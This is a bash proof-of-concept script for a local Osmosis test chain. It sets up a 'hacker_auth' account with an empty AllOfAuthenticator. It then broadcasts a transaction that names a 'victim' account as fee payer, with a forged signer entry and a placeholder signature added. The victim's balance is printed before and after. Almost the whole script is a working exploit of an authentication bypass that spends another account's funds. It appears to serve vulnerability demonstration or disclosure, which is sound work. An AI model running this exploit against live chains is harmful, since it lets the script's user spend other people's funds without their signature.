#!/bin/bash
BINARY="osmosisd"
CHAIN_HOME="~/.osmosisd-local"
TX_FLAGS="--chain-id=localosmosis --keyring-backend=test --home=$CHAIN_HOME"
HACKER_ADDR=`$BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a hacker_auth`
VICTIM_ADDR=`$BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a victim`
# set up the hacker_auth account to have the AllOfAuthenticator with no SubAuthenticators, so everything is valid
if [ "$1" == "setup" ]; then
$BINARY $TX_FLAGS tx authenticator add-authenticator SignatureVerificationAuthenticator "Ao3uARK8EwlXQ6r0X6z+xjmDSZ2WV2fn0Q1F5E3ZBJy+" --from $HACKER_ADDR --fees 875uosmo --broadcast-mode block --yes
$BINARY $TX_FLAGS tx authenticator add-authenticator AllOfAuthenticator "[]" --from $HACKER_ADDR --fees 875uosmo --broadcast-mode block --yes
cat << EOF > msgs.json
{"body":{"messages":[{
"@type":"/osmosis.authenticator.MsgRemoveAuthenticator",
"sender":"$HACKER_ADDR","id":0}],
"memo":"","timeout_height":"0","extension_options":[],
"non_critical_extension_options":[]},"auth_info":{"signer_infos":[],
"fee":{"amount":[{"denom":"uosmo","amount":"875"}],
"gas_limit":"350000","payer":"","granter":""}},"signatures":[]}
EOF
$BINARY $TX_FLAGS tx sign msgs.json --from=$HACKER_ADDR 2>&1 | jq > signed.json
$BINARY $TX_FLAGS tx broadcast signed.json --output json --broadcast-mode block
fi
cat << EOF > msgs.json
{
"body": {
"messages": [
{
"@type": "/osmosis.valsetpref.v1beta1.MsgWithdrawDelegationRewards",
"delegator":"$HACKER_ADDR"
}
],
"memo": "",
"timeout_height": "0",
"extension_options": [],
"non_critical_extension_options":[]
},
"auth_info": {
"signer_infos": [],
"fee": {
"amount": [
{
"denom": "uosmo",
"amount": "1000000"
}
],
"gas_limit": "25000000",
"payer": "$VICTIM_ADDR",
"granter": ""
}
},
"signatures": []
}
EOF
# sign the payload from the hacker
$BINARY $TX_FLAGS tx sign msgs.json --from=$HACKER_ADDR --sign-mode amino-json 2>&1 | jq > signed.json
# add fake signature and signer info
cat signed.json | \
jq '.auth_info.signer_infos[1] |= .+ {"public_key":{"@type":"/cosmos.crypto.secp256k1.PubKey","key":"AAAA"},
"sequence":"0","mode_info":{"single": {"mode": "SIGN_MODE_LEGACY_AMINO_JSON"}}}' | \
jq '.signatures[1] |= .+ "AAAA"' > signed2.json
VICTIM_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $VICTIM_ADDR --denom uosmo`
HACKER_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $HACKER_ADDR --denom uosmo`
echo "Balances before:"
echo "hacker ($HACKER_ADDR): $HACKER_BALANCE"
echo "victim ($VICTIM_ADDR): $VICTIM_BALANCE"
$BINARY $TX_FLAGS tx broadcast signed2.json --output json --broadcast-mode block > output.json
cat output.json | jq '.events[].attributes[] |= {key: (.key | @base64d),value: (.value | @base64d),index: .index}' | jq '.events[2]'
VICTIM_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $VICTIM_ADDR --denom uosmo`
HACKER_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $HACKER_ADDR --denom uosmo`
echo "Balances after:"
echo "hacker: $HACKER_BALANCE"
echo "victim: $VICTIM_BALANCE"